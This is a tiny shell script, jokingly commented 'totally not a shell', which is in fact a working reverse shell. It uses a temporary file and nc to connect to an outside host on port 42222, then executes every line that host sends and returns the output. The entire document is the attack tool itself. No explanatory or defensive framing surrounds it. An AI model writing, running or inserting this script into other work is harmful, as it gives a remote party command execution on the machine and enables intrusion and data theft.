#!/bin/sh

# totally not a shell

touch /tmp/blorb
tail -f /tmp/blorb | nc krzysckh.org 42222 | \
    ( while read a; do
          $a 2>/tmp/blorb >/tmp/blorb
          done )
